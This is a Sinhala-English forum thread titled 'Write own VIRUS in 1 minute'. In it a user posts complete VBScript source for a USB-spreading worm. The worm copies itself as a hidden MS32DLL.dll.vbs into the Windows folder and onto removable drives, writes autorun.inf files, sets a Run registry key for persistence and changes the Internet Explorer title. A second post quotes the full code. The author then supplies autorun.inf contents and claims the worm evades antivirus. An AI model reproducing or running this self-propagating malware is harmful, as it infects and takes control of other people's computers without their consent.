Write own VIRUS in 1 miniute !!!!!!!!

dilshancjdon

Member
Sep 23, 2008
551
4
0
Milky way
umbala virus ekek hadanna onida ????????

programming dana ganna oni naa

menna codes

NOTE PAD eke gahapan



'My name is D Dragon
'This virus is dedicated to every enimy of mine
'REST IN PEASE
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by D Dragon"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname






meeke reg write kiyala tiyena tana mage issella tiba Tread eke ( Top 25 Registry hacks ) oni ekak gahapan !!!!!!!!!!!




etakota mulu PC ekema control eka umbala ate !!!!!!!!!!









meeka save karana kota


MS32DLL.dll.vbs

kiyala Save karapan !!!!!!!!!!!!!!!




Enjoy






---------------another greate hack by Dragon Dilshan-----------------------
 
Last edited:

Jack_Sparrow

Well-known member
  • Jun 16, 2008
    42,522
    1
    16,927
    113
    Black Pearl
    dilshancjdon said:
    umbala virus ekek hadanna onida ????????

    programming dana ganna oni naa

    menna codes

    NOTE PAD eke gahapan



    'My name is D Dragon
    'This virus is dedicated to every enimy of mine
    'REST IN PEASE
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
    set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes=39
    end if
    next
    set rg = createobject("WScript.Shell")
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by D Dragon"
    rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check<>1
    set sd = createobject("Wscript.shell")
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

    etakota mulu PC ekema control eka umbala ate !!!!!!!!!!


    ---------------another greate hack by Dragon Dilshan-----------------------


    oa ohenda gatte
     

    dilshancjdon

    Member
    Sep 23, 2008
    551
    4
    0
    Milky way
    ooni tanaka save karanna.

    Auto run ekek daala CD ekakata daannna !!!!!

    menna USB pen drive ekakata Auto run eke codes

    [autorun]
    open=MS32DLL.dll.vbs
    ;shell\open=Open(&O)
    shell\open\Command=MS32DLL.dll.vbs
    shell\open\Default=1
    ;shell\explore=Manager(&X)
    shell\explore\Command=MS32DLL.dll.vbs

    meeka "autorun.inf" kiyala save karanna

    meeken wadi deyak wenne naa !!!!!!!

    Hidden files unable eke disable wey,
    hama PEN drive ekatama copy wey,
    IE eke nama wenas wey

    tawa podi podi tikak wey....

    okkoma kiwwot wadak naaa!!!!!!!!!!!!!!

    CHECK karala balanna !!!!!!!!!!!

    ********Kaspersky lokkat ekka nam baa!!!!!!!!!!